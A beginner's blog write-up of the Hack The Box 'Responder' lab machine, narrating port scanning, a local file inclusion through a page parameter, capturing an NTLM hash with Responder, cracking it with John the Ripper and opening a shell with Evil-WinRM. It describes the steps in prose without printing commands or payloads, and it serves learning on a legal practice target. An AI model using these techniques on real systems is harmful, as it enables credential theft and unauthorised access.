Another HTB post, this time focusing on Tier 1 machines, more specifically the Responder machine. This was perhaps the first machine that really made me wreck my remaining 2 brain cells. This machine introduced the Responder tool, local file inclusion exploit, how to capture an NTLM hash, and John the Ripper.
The HTB Tier 1 write-up is as follows:
In the second tier, you’ll delve deeper into the world of cybersecurity pen-testing, focusing on web exploitation techniques suitable for beginners. You’ll discover the basics of SQL injection, Server Side Template Injection, Remote File Inclusion, and gain a grasp of how to use Web/Reverse Shells effectively.
Finally, you’ll round out your expertise by understanding how to upload files to an S3 Bucket, providing you with a comprehensive range of skills to excel in the cybersecurity field. This tier takes you one step further in your pen-testing journey.
Tier 1 — Responder
Enumeration
Instead of using Nmap to scan all 65,535 ports, I utilise Rustscan to quickly scan all ports within a much shorter amount of time. I then use Nmap to scan the selected ports identified by Rustscan to obtain more information.
Seeing that there’s a web service being run, I attempted to access the site. However, I was met with a “Server Not Found”.
To bypass this, I only had to append the target IP and domain to my /etc/hosts file. This allows the browser to resolve the IP address for the host (unika.htb) by including the HTTP header in every HTTP request to this IP.
Exploitation
I ran Gobuster in an attempt to identify hidden pages within the domain, but there was none. I attempted SQL injection in the site’s contact form but to no success either. I was stumped, so it was back to Googling.
After some interactions, I found that there were French and German versions of the site with the HTML page parameter. With this page parameter, we can test if it was possible to do a local file inclusion by editing the page parameter. A local file inclusion occurs when a website can be exploited to include a file that was not intended for the application, allowing access to the local file system. A common file is the /windows/system32/drivers/etc/hosts file.
After setting up Responder to listen for events, I edited the page parameter to include my machine’s IP with a non-existent file. Responder sends a request to the client which the client will encrypt with the user’s password, capturing the NTLM hash.
Now with this NTLM hash, we can throw this to John the Ripper to crack the hash, showing us the password in plain text.
Now that we have a set of credentials, we can attempt to interact with the WinRM service run on port 5985 (as shown in the Nmap scan). To do this, we use Evil-WinRM to start a shell.
Foothold
Now that we have a shell as the Admin user, it was only a matter of looking through the directories to locate the flag. HTB has a practice of leaving their flags in the Desktop directory, and sure enough it was located in another user’s Desktop.
Conclusion
Doing this machine for the first time was a real pain (isn’t it always), but I learnt so much. It is also really satisfying after struggling for hours and finally capturing the flag. Many more machines and much more to learn!
John
